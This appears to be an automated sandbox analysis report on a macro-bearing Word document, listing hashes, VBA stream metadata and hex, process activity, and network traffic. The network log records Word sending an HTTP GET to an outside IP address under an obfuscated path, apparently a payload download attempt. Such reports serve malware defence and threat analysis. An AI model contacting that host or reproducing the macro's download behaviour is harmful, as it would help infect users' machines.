                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.1335506491402776
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/Zd3IlUltp4R+MgQ/l2Flj/FlqKeZXt//n:RtZ1IlbxwEz9
                                                                                                                                              MD5:862125B361C3F3D1C58A47A13459013D
                                                                                                                                              SHA1:BCE74CEBDF0D98684B672EEB5B9229933B947033
                                                                                                                                              SHA-256:66E981E3F58E476D8D5746CAAD05697E49A19927EB318229E9C178820A84168E
                                                                                                                                              SHA-512:A53B2B4267D3A07F8AA50DCF227339A3C7C3D66970F9199104C6D467148525D988184D0851C76E1DE188D4756483C1A6579FBE367D94CD7BDCDB92D09FCE27FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h........../.L.1...^.i@..iT..i`..iDB.iZR.i./.L.2..........$.......6C......;/.L.3..............

                                                                                                                                              C:\Users\user\Desktop\~$ewton doc 08.11.2022.doc

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.1335506491402776
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/Zd3IlUltp4R+MgQ/l2Flj/FlqKeZXt//n:RtZ1IlbxwEz9
                                                                                                                                              MD5:862125B361C3F3D1C58A47A13459013D
                                                                                                                                              SHA1:BCE74CEBDF0D98684B672EEB5B9229933B947033
                                                                                                                                              SHA-256:66E981E3F58E476D8D5746CAAD05697E49A19927EB318229E9C178820A84168E
                                                                                                                                              SHA-512:A53B2B4267D3A07F8AA50DCF227339A3C7C3D66970F9199104C6D467148525D988184D0851C76E1DE188D4756483C1A6579FBE367D94CD7BDCDB92D09FCE27FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h........../.L.1...^.i@..iT..i`..iDB.iZR.i./.L.2..........$.......6C......;/.L.3..............

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Zip archive data, at least v2.0 to extract
                                                                                                                                              Entropy (8bit):7.993716519832146
                                                                                                                                              TrID:
                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                              • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                              File name:cnewton doc 08.11.2022.doc
                                                                                                                                              File size:2343230
                                                                                                                                              MD5:ee1d6eb5b07b99e65fc0cb477193c35c
                                                                                                                                              SHA1:9d4dbf701c8ede93a79036dd5a0316da988a2eeb
                                                                                                                                              SHA256:23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
                                                                                                                                              SHA512:869cdd01eb85cd12a1a27dc0099250e4fb33b3ed72a7e0375e80206b07b01aaff108ede1626de99f29c9a7cbc7524a4e4947b976be2e392b2d777c8df1fc54fc
                                                                                                                                              SSDEEP:49152:xyG/bJ98ozhp4kBA4Y0bRfqmlYOxtKW72swkql:QS8otukBbRfqUjRy7T
                                                                                                                                              TLSH:C4B5333D16FB0348D87D3A125E1F1EC212BDCD45E01BC82F684B657AB5377846A68EE8
                                                                                                                                              File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/682599/sample/cnewton doc 08.11.2022.doc"

                                                                                                                                              Indicators
                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:True
                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                              Flash Objects Count:0
                                                                                                                                              Contains VBA Macros:True

                                                                                                                                              Streams with VBA

                                                                                                                                              VBA File Name: ThisDocument.cls, Stream Size: 2836
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/ThisDocument
                                                                                                                                              VBA File Name:ThisDocument.cls
                                                                                                                                              Stream Size:2836
                                                                                                                                              Data ASCII:. J . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . L i . b " u s e r 3 . 2 " A l i a s . " S e t T i m . e r " ( B y V 8 a l . . . . . A s L o n g * , . . . . . . . 5 . . . . . . .
                                                                                                                                              Data Raw:01 4a b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                                                                                                              VBA Code

                                                                                                                                              Streams

                                                                                                                                              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 369
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECT
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Stream Size:369
                                                                                                                                              Entropy:5.302596554682153
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:I D = " { 1 4 9 A B 1 3 B - 1 5 A A - 4 3 8 2 - 8 9 7 7 - F C 2 5 F 7 E D D 7 B A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 A 3 8 C 5 0 D F B 1 1 F B 1 1 F B 1 1 F B 1 1 " . . D P B = " 7 4 7 6 8 B 4 F F F 8 8 0 0 8 8 0 0 8 8 " . . G C = " A E A C 5 1 9 1 B 1 F 1 E A F 2 E A F 2 1 5 " . . . . [ H o s t E x t e n d e r I n f
                                                                                                                                              Data Raw:49 44 3d 22 7b 31 34 39 41 42 31 33 42 2d 31 35 41 41 2d 34 33 38 32 2d 38 39 37 37 2d 46 43 32 35 46 37 45 44 44 37 42 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                              Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECTwm
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:41
                                                                                                                                              Entropy:3.0773844850752607
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                              Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                                                                              File Type:ISO-8859 text, with no line terminators
                                                                                                                                              Stream Size:7
                                                                                                                                              Entropy:1.8423709931771088
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:a . . .
                                                                                                                                              Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                              Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5108
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_2
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:5108
                                                                                                                                              Entropy:1.9370407590218233
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) > . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                              Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_3
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:2724
                                                                                                                                              Entropy:2.6897674029679903
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . 1 . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . a . . . . . . . . . . . X . . p . . . . . . ! . . . . . . . . . . . a . . . . . . .
                                                                                                                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 b1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                              Stream Path: VBA/dir, File Type: data, Stream Size: 486
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/dir
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:486
                                                                                                                                              Entropy:6.304387507848704
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . I d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A - .
                                                                                                                                              Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 c5 49 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Aug 11, 2022 18:49:57.318861008 CEST4974180192.168.2.345.8.146.139
                                                                                                                                              Aug 11, 2022 18:49:57.422590017 CEST804974145.8.146.139192.168.2.3
                                                                                                                                              Aug 11, 2022 18:49:57.422734022 CEST4974180192.168.2.345.8.146.139
                                                                                                                                              Aug 11, 2022 18:49:57.423239946 CEST4974180192.168.2.345.8.146.139
                                                                                                                                              Aug 11, 2022 18:49:57.526897907 CEST804974145.8.146.139192.168.2.3
                                                                                                                                              Aug 11, 2022 18:49:57.540335894 CEST804974145.8.146.139192.168.2.3
                                                                                                                                              Aug 11, 2022 18:49:57.540467978 CEST4974180192.168.2.345.8.146.139
                                                                                                                                              Aug 11, 2022 18:50:02.545648098 CEST804974145.8.146.139192.168.2.3
                                                                                                                                              Aug 11, 2022 18:50:02.545905113 CEST4974180192.168.2.345.8.146.139
                                                                                                                                              Aug 11, 2022 18:50:46.149507046 CEST4974180192.168.2.345.8.146.139

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • 45.8.146.139

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.34974145.8.146.13980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Aug 11, 2022 18:49:57.423239946 CEST1165OUTGET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 45.8.146.139
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Aug 11, 2022 18:49:57.540335894 CEST1165INHTTP/1.1 200 OK
                                                                                                                                              Date: Thu, 11 Aug 2022 16:49:57 GMT
                                                                                                                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                              Content-Length: 201
                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 2d 66 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "-f" was not found on this server.</p></body></html>


                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:18:49:45
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                              Imagebase:0x8a0000
                                                                                                                                              File size:1937688 bytes
                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:18:50:32
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160
                                                                                                                                              Imagebase:0xb30000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:18:50:32
                                                                                                                                              Start date:11/08/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152
                                                                                                                                              Imagebase:0xb30000
                                                                                                                                              File size:434592 bytes
                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Disassembly

                                                                                                                                              No disassembly